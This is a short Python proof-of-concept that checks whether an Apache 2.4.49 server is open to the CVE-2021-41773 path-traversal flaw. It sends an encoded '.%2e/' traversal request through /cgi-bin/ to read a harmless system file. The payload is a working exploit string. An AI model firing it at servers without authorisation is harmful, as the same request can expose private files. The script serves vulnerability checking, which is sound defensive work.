############################################################################
# PoC for CVE-2021-41773                                                   #
# By: Jordan Jay (@0xLegacyy)                                              #
#                                                                          #
# Apache 2.4.49 is the only version vulnerable to this.                    #
############################################################################

import argparse, requests




if __name__ == "__main__":

    # Set up args.
    parser = argparse.ArgumentParser(description="Checks if an apache server is vulnerable to CVE-2021-41773.")

    parser.add_argument(
        "host",
        help="ip/domain to be checked e.g. 'https://google.com/'"
    )
    parser.add_argument(
        "--nosslcheck", "-n", dest='verifySsl', action='store_false',
        help="Do not verify ssl certificates"
    )


    parser.set_defaults(verifySsl=True)


    args = parser.parse_args()

    # Parse args.
    # If no protocol in request, exit and ask the user for one in case of http:// or https://, we dont know which they will want.
    if not ("://" in args.host):
        print("[!] Host paramater missing protocol (http:// or https://)\nexiting...")
        exit(-1)

    # Try reading /usr/share/bash-completion/bash_completion, is world readable and in /usr/share, so default config should allow us to read it.
    # If we see the flag in the response, it's vulnerable.
    flag = "bash_completion - programmable completion functions for bash"
    payload = ".%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/usr/share/bash-completion/bash_completion"

    if flag not in requests.get(f"{args.host}/cgi-bin/{payload}", verify=args.verifySsl).content.decode():
        print(f"[-] {args.host} not vulnerable")
        exit(-1)

    print(f"[+] {args.host} is vulnerable!")